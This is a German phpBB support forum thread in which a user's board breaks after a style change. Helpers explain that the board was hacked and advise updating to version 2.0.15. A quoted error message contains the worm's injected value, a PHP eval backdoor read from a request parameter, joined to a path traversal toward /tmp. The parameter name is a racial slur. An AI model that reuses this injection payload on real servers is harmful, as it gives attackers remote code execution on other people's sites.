Rießen Problem mit nem Style!!!!
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.0, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.0, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Rießen Problem mit nem Style!!!!
Hab vorhin gesehen dass mir mein Forum einen vorhandene anderen Style als SubSilver anzeigt und hab ihn ausgewählt und danach gesehend ass er gar nicht auf dem server vorhanden ist und kann nun mein Forum nichtmehr aufrufen weil das hier kommt:
http://www.jschellmann.de/claudius
BITTE HELFT MIR, ich will doch nur wieder zugreifen können!!
http://www.jschellmann.de/claudius
BITTE HELFT MIR, ich will doch nur wieder zugreifen können!!
-
- Mitglied
Dein Board ist gehackt worden!Warning: is_dir() [function.is-dir]: open_basedir restriction in effect. File(./templates/aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp) is not within the allowed path(s): (/home/www/htdocs/jschellmann.de/.) in /home/www/htdocs/jschellmann.de/claudius/includes/template.php on line 77
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
DEBUG MODE
Line : 326
File : /home/www/htdocs/jschellmann.de/claudius/includes/functions.php

Suche mal bitte in diesem Forum unter "nigga"!
Und das hier: Mein Forum wurde gecrackt - was nun?
Unbedingt auf Version 2.0.15 updaten!!!!!!
Gruß,
Jo.
Ca. 80% aller Computerprobleme sitzen vor dem Bildschirm!
Ich glaub´s für Dich mit.Shack! hat geschrieben:unfassbar ich kann nicht glauben!!!

Traurig aber wahr!
Jetzt gehst Du halt bei diesem schönen Wetter heute abend nicht in den Biergarten und morgen legst Du Dich dann eben auch nicht in die Sonne, sondern versuchst, Dein Forum wieder in die Gänge zu bekommen.
(Gemein, ich weiß! Aber hättest Du vorher Dein Board auf die neueste Version upgedatet, dann hättest Du das Problem jetzt nicht.)
Kopf hoch, wird schon!
Gruß,
Jo.
Ca. 80% aller Computerprobleme sitzen vor dem Bildschirm!
- kratzer54847
- Mitglied
wenn nicht,siehts schlecht aus!
Zerhaut der Wurm eigentlich auch die Datenbank?
Das solltest du mal in KB:phpmyadmin nachprüfen.
mfg Johny
wenn nicht,siehts schlecht aus!
Zerhaut der Wurm eigentlich auch die Datenbank?
Das solltest du mal in KB:phpmyadmin nachprüfen.
mfg Johny
Knowledge Base | MOD Datenbank | Boardsuche | HTML | PHP
Durch die richtige Verwendung dieser Links können viele Fragen beantwortet werden
Durch die richtige Verwendung dieser Links können viele Fragen beantwortet werden